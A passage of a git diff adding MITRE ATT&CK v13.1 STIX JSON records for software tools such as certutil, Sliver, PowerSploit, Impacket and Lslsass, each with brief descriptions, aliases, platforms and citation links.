"tool", + "id": "tool--0a68f1f1-da74-4d28-8d9a-696c082706cc", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0160", + "external_id": "S0160" + }, + { + "source_name": "TechNet Certutil", + "description": "Microsoft. (2012, November 14). Certutil. Retrieved July 3, 2017.", + "url": "https://technet.microsoft.com/library/cc732443.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--0c8465c0-d0b4-4670-992e-4eee8d7ff952.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--0c8465c0-d0b4-4670-992e-4eee8d7ff952.json new file mode 100644 index 0000000000000000000000000000000000000000..dc6af6ffa093c43bd0de0c267069a9a3cc75768f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--0c8465c0-d0b4-4670-992e-4eee8d7ff952.json @@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--c5d0d0c4-d5d8-4ee5-9724-4c806cfc5269", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-22T20:56:56.049Z", + "name": "at", + "description": "[at](https://attack.mitre.org/software/S0110) is used to schedule tasks on a system to run at a specified date or time.(Citation: TechNet At)(Citation: Linux at)", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_aliases": [ + "at", + "at.exe" + ], + "type": "tool", + "id": "tool--0c8465c0-d0b4-4670-992e-4eee8d7ff952", + "created": "2017-05-31T21:33:06.824Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0110", + "external_id": "S0110" + }, + { + "source_name": "Linux at", + "description": "IEEE/The Open Group. (2017). at(1p) \u2014 Linux manual page. Retrieved February 25, 2022.", + "url": "https://man7.org/linux/man-pages/man1/at.1p.html" + }, + { + "source_name": "TechNet At", + "description": "Microsoft. (n.d.). At. Retrieved April 28, 2016.", + "url": "https://technet.microsoft.com/en-us/library/bb490866.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--102c3898-85e0-43ee-ae28-62a0a3ed9507.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--102c3898-85e0-43ee-ae28-62a0a3ed9507.json new file mode 100644 index 0000000000000000000000000000000000000000..3c24f9b788aaa9dd2ceba4faecdf8d7c7948f4f4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--102c3898-85e0-43ee-ae28-62a0a3ed9507.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--7752a3bb-9f78-4f95-9a8a-c1037db8e111", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--102c3898-85e0-43ee-ae28-62a0a3ed9507", + "type": "tool", + "created": "2017-05-31T21:33:09.047Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0116", + "external_id": "S0116" + }, + { + "source_name": "Github UACMe", + "description": "UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016.", + "url": "https://github.com/hfiref0x/UACME" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "UACMe", + "description": "[UACMe](https://attack.mitre.org/software/S0116) is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. (Citation: Github UACMe)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--115f88dd-0618-4389-83cb-98d33ae81848.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--115f88dd-0618-4389-83cb-98d33ae81848.json new file mode 100644 index 0000000000000000000000000000000000000000..1b5b1fcebe74562d0b63dd8d0011a467d13195f2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--115f88dd-0618-4389-83cb-98d33ae81848.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--14085587-a127-4b2a-8c81-940349e07194", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "ShimRatReporter" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--115f88dd-0618-4389-83cb-98d33ae81848", + "type": "tool", + "created": "2020-05-12T21:29:48.294Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0445", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0445" + }, + { + "source_name": "FOX-IT May 2016 Mofang", + "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf", + "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020." + } + ], + "modified": "2020-05-27T22:39:28.701Z", + "name": "ShimRatReporter", + "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) is a tool used by suspected Chinese adversary [Mofang](https://attack.mitre.org/groups/G0103) to automatically conduct initial discovery. The details from this discovery are used to customize follow-on payloads (such as [ShimRat](https://attack.mitre.org/software/S0444)) as well as set up faux infrastructure which mimics the adversary's targets. [ShimRatReporter](https://attack.mitre.org/software/S0445) has been used in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development.(Citation: FOX-IT May 2016 Mofang)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--11f8d7eb-1927-4806-9267-3a11d4d4d6be.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--11f8d7eb-1927-4806-9267-3a11d4d4d6be.json new file mode 100644 index 0000000000000000000000000000000000000000..355f04c984fb1e732b0c9a75e4c8a48b55951ef2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--11f8d7eb-1927-4806-9267-3a11d4d4d6be.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--9f6d1506-5f14-419c-8fec-8b2b051ea197", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-01-17T22:14:02.852Z", + "name": "Sliver", + "description": "[Sliver](https://attack.mitre.org/software/S0633) is an open source, cross-platform, red team command and control framework written in Golang.(Citation: Bishop Fox Sliver Framework August 2019)", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Achute Sharma, Keysight", + "Ayan Saha, Keysight" + ], + "x_mitre_aliases": [ + "Sliver" + ], + "type": "tool", + "id": "tool--11f8d7eb-1927-4806-9267-3a11d4d4d6be", + "created": "2021-07-30T15:43:17.770Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0633", + "external_id": "S0633" + }, + { + "source_name": "Bishop Fox Sliver Framework August 2019", + "description": "Kervella, R. (2019, August 4). Cross-platform General Purpose Implant Framework Written in Golang. Retrieved July 30, 2021.", + "url": "https://labs.bishopfox.com/tech-blog/sliver" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--1244e058-fa10-48cb-b484-0bcf671107ae.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--1244e058-fa10-48cb-b484-0bcf671107ae.json new file mode 100644 index 0000000000000000000000000000000000000000..fbf345beb2338f6bba5b430045f11d7614fc4afe --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--1244e058-fa10-48cb-b484-0bcf671107ae.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--7d1b2057-c2ab-4892-90d4-4a1bac8d3dd9", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-14T19:27:39.308Z", + "name": "SILENTTRINITY", + "description": "[SILENTTRINITY](https://attack.mitre.org/software/S0692) is an open source remote administration and post-exploitation framework primarily written in Python that includes stagers written in Powershell, C, and Boo. [SILENTTRINITY](https://attack.mitre.org/software/S0692) was used in a 2019 campaign against Croatian government agencies by unidentified cyber actors.(Citation: GitHub SILENTTRINITY March 2022)(Citation: Security Affairs SILENTTRINITY July 2019)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Daniel Acevedo, @darmad0, ARMADO" + ], + "x_mitre_aliases": [ + "SILENTTRINITY" + ], + "type": "tool", + "id": "tool--1244e058-fa10-48cb-b484-0bcf671107ae", + "created": "2022-03-23T19:34:30.486Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0692", + "external_id": "S0692" + }, + { + "source_name": "SILENTTRINITY", + "description": "(Citation: GitHub SILENTTRINITY March 2022)" + }, + { + "source_name": "Security Affairs SILENTTRINITY July 2019", + "description": "Paganini, P. (2019, July 7). Croatia government agencies targeted with news SilentTrinity malware. Retrieved March 23, 2022.", + "url": "https://securityaffairs.co/wordpress/88021/apt/croatia-government-silenttrinity-malware.html" + }, + { + "source_name": "GitHub SILENTTRINITY March 2022", + "description": "Salvati, M (2019, August 6). SILENTTRINITY. Retrieved March 23, 2022.", + "url": "https://github.com/byt3bl33d3r/SILENTTRINITY" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d.json new file mode 100644 index 0000000000000000000000000000000000000000..b94854ebc5aaf7e2ab02681cd265e57ba3af9c8a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--3acafd20-81d9-4d8d-bb5c-f7ce94af8142", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T05:12:48.213Z", + "name": "PowerSploit", + "description": "[PowerSploit](https://attack.mitre.org/software/S0194) is an open source, offensive security framework comprised of [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. (Citation: GitHub PowerSploit May 2012) (Citation: PowerShellMagazine PowerSploit July 2014) (Citation: PowerSploit Documentation)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.6", + "x_mitre_aliases": [ + "PowerSploit" + ], + "type": "tool", + "id": "tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0194", + "external_id": "S0194" + }, + { + "source_name": "PowerShellMagazine PowerSploit July 2014", + "description": "Graeber, M. (2014, July 8). PowerSploit. Retrieved February 6, 2018.", + "url": "http://www.powershellmagazine.com/2014/07/08/powersploit/" + }, + { + "source_name": "GitHub PowerSploit May 2012", + "description": "PowerShellMafia. (2012, May 26). PowerSploit - A PowerShell Post-Exploitation Framework. Retrieved February 6, 2018.", + "url": "https://github.com/PowerShellMafia/PowerSploit" + }, + { + "source_name": "PowerSploit Documentation", + "description": "PowerSploit. (n.d.). PowerSploit. Retrieved February 6, 2018.", + "url": "http://powersploit.readthedocs.io" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--242f3da3-4425-4d11-8f5c-b842886da966.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--242f3da3-4425-4d11-8f5c-b842886da966.json new file mode 100644 index 0000000000000000000000000000000000000000..4dd79f44322aea01ba65bbf8aa612defe7343810 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--242f3da3-4425-4d11-8f5c-b842886da966.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--88f14ed4-34c1-4bd9-8ab1-73051418dc7b", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Windows Credential Editor", + "WCE" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--242f3da3-4425-4d11-8f5c-b842886da966", + "type": "tool", + "created": "2017-05-31T21:32:12.684Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0005", + "external_id": "S0005" + }, + { + "source_name": "Amplia WCE", + "description": "Amplia Security. (n.d.). Windows Credentials Editor (WCE) F.A.Q.. Retrieved December 17, 2015.", + "url": "http://www.ampliasecurity.com/research/wcefaq.html" + } + ], + "modified": "2020-03-30T18:28:34.296Z", + "name": "Windows Credential Editor", + "description": "[Windows Credential Editor](https://attack.mitre.org/software/S0005) is a password dumping tool. (Citation: Amplia WCE)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--26c87906-d750-42c5-946c-d4162c73fc7b.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--26c87906-d750-42c5-946c-d4162c73fc7b.json new file mode 100644 index 0000000000000000000000000000000000000000..e91742ef1361541acda5b26c7a804f5f26785ac4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--26c87906-d750-42c5-946c-d4162c73fc7b.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--33fc9bcd-a710-4281-8e79-9a1374fd31ac", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-01-23T20:52:37.112Z", + "name": "Impacket", + "description": "[Impacket](https://attack.mitre.org/software/S0357) is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. [Impacket](https://attack.mitre.org/software/S0357) contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.(Citation: Impacket Tools)", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.4", + "x_mitre_contributors": [ + "Jacob Wilkin, Trustwave, SpiderLabs" + ], + "x_mitre_aliases": [ + "Impacket" + ], + "type": "tool", + "id": "tool--26c87906-d750-42c5-946c-d4162c73fc7b", + "created": "2019-01-31T01:39:56.283Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0357", + "external_id": "S0357" + }, + { + "source_name": "Impacket Tools", + "description": "SecureAuth. (n.d.). Retrieved January 15, 2019.", + "url": "https://www.secureauth.com/labs/open-source-tools/impacket" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--294e2560-bd48-44b2-9da2-833b5588ad11.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--294e2560-bd48-44b2-9da2-833b5588ad11.json new file mode 100644 index 0000000000000000000000000000000000000000..7edfa8177d0ca83e907330001537c547886a6fe3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--294e2560-bd48-44b2-9da2-833b5588ad11.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--29fef41d-e6eb-46db-a7d3-56282460b12c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-12T21:28:49.335Z", + "name": "ipconfig", + "description": "[ipconfig](https://attack.mitre.org/software/S0100) is a Windows utility that can be used to find information about a system's TCP/IP, DNS, DHCP, and adapter configuration. (Citation: TechNet Ipconfig)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "ipconfig" + ], + "type": "tool", + "id": "tool--294e2560-bd48-44b2-9da2-833b5588ad11", + "created": "2017-05-31T21:33:02.863Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0100", + "external_id": "S0100" + }, + { + "source_name": "TechNet Ipconfig", + "description": "Microsoft. (n.d.). Ipconfig. Retrieved April 17, 2016.", + "url": "https://technet.microsoft.com/en-us/library/bb490921.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--2c5281dd-b5fd-4531-8aea-c1bf8a0f8756.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--2c5281dd-b5fd-4531-8aea-c1bf8a0f8756.json new file mode 100644 index 0000000000000000000000000000000000000000..660e8098844a9537467e913dd9b60b0b909baded --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--2c5281dd-b5fd-4531-8aea-c1bf8a0f8756.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--46818440-51da-418a-970b-2ad195d29f0f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-15T00:59:18.335Z", + "name": "AADInternals", + "description": "[AADInternals](https://attack.mitre.org/software/S0677) is a PowerShell-based framework for administering, enumerating, and exploiting Azure Active Directory. The tool is publicly available on GitHub.(Citation: AADInternals Github)(Citation: AADInternals Documentation)", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_aliases": [ + "AADInternals" + ], + "type": "tool", + "id": "tool--2c5281dd-b5fd-4531-8aea-c1bf8a0f8756", + "created": "2022-02-01T15:08:45.007Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0677", + "external_id": "S0677" + }, + { + "source_name": "AADInternals", + "description": "Dr. Nestori Syynimaa. (2018, October 25). AADInternals. Retrieved February 1, 2022.", + "url": "https://o365blog.com/aadinternals/" + }, + { + "source_name": "AADInternals Documentation", + "description": "Dr. Nestori Syynimaa. (2018, October 25). AADInternals. Retrieved February 18, 2022.", + "url": "https://o365blog.com/aadinternals" + }, + { + "source_name": "AADInternals Github", + "description": "Dr. Nestori Syynimaa. (2021, December 13). AADInternals. Retrieved February 1, 2022.", + "url": "https://github.com/Gerenios/AADInternals" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--2e45723a-31da-4a7e-aaa6-e01998a6788f.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--2e45723a-31da-4a7e-aaa6-e01998a6788f.json new file mode 100644 index 0000000000000000000000000000000000000000..9fec29455e95463242d3f201bcb84588503ab858 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--2e45723a-31da-4a7e-aaa6-e01998a6788f.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--34b18408-90cb-4bbb-958f-72423d8264cf", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-12T21:30:23.536Z", + "name": "Tasklist", + "description": "The [Tasklist](https://attack.mitre.org/software/S0057) utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface. (Citation: Microsoft Tasklist)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "Tasklist" + ], + "type": "tool", + "id": "tool--2e45723a-31da-4a7e-aaa6-e01998a6788f", + "created": "2017-05-31T21:32:39.233Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0057", + "external_id": "S0057" + }, + { + "source_name": "Microsoft Tasklist", + "description": "Microsoft. (n.d.). Tasklist. Retrieved December 23, 2015.", + "url": "https://technet.microsoft.com/en-us/library/bb491010.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--2fab555f-7664-4623-b4e0-1675ae38190b.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--2fab555f-7664-4623-b4e0-1675ae38190b.json new file mode 100644 index 0000000000000000000000000000000000000000..94033a0db0bbbeacff54fa0890259f0afefacd06 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--2fab555f-7664-4623-b4e0-1675ae38190b.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--b80b76a9-fe0e-4dc6-a766-caef6905fd60", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Lslsass" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--2fab555f-7664-4623-b4e0-1675ae38190b", + "type": "tool", + "created": "2017-05-31T21:33:10.962Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0121", + "external_id": "S0121" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "modified": "2020-03-30T16:59:48.036Z", + "name": "Lslsass", + "description": "[Lslsass](https://attack.mitre.org/software/S0121) is a publicly-available tool that can dump active logon session password hashes from the lsass process. (Citation: Mandiant APT1)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--30489451-5886-4c46-90c9-0dff9adc5252.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--30489451-5886-4c46-90c9-0dff9adc5252.json new file mode 100644 index 0000000000000000000000000000000000000000..60359e3015c94d213663b9a0de57748b04a2271f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--30489451-5886-4c46-90c9-0dff9adc5252.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--b485e72b-1bd7-46ae-8dc7-02d42ce2509b", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Arp", + "arp.exe" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--30489451-5886-4c46-90c9-0dff9adc5252", + "type": "tool", + "created": "2017-05-31T21:33:02.428Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0099", + "external_id": "S0099" + }, + { + "source_name": "TechNet Arp", + "description": "Microsoft. (n.d.). Arp. Retrieved April 17, 2016.", + "url": "https://technet.microsoft.com/en-us/library/bb490864.aspx" + } + ], + "modified": "2021-12-07T18:27:04.603Z", + "name": "Arp", + "description": "[Arp](https://attack.mitre.org/software/S0099) displays and modifies information about a system's Address Resolution Protocol (ARP) cache. (Citation: TechNet Arp)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--33b9e38f-103c-412d-bdcf-904a91fff1e4.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--33b9e38f-103c-412d-bdcf-904a91fff1e4.json new file mode 100644 index 0000000000000000000000000000000000000000..dddc046ed3c98eacdc28c3cb4db90d2dc1d380b7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--33b9e38f-103c-412d-bdcf-904a91fff1e4.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--42d9c4e8-3d61-4e98-be66-b2c9ac01d3c5", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "spwebmember" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--33b9e38f-103c-412d-bdcf-904a91fff1e4", + "type": "tool", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0227", + "external_id": "S0227" + }, + { + "source_name": "spwebmember", + "description": "(Citation: NCC Group APT15 Alive and Strong)" + }, + { + "source_name": "NCC Group APT15 Alive and Strong", + "description": "Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. Retrieved April 4, 2018.", + "url": 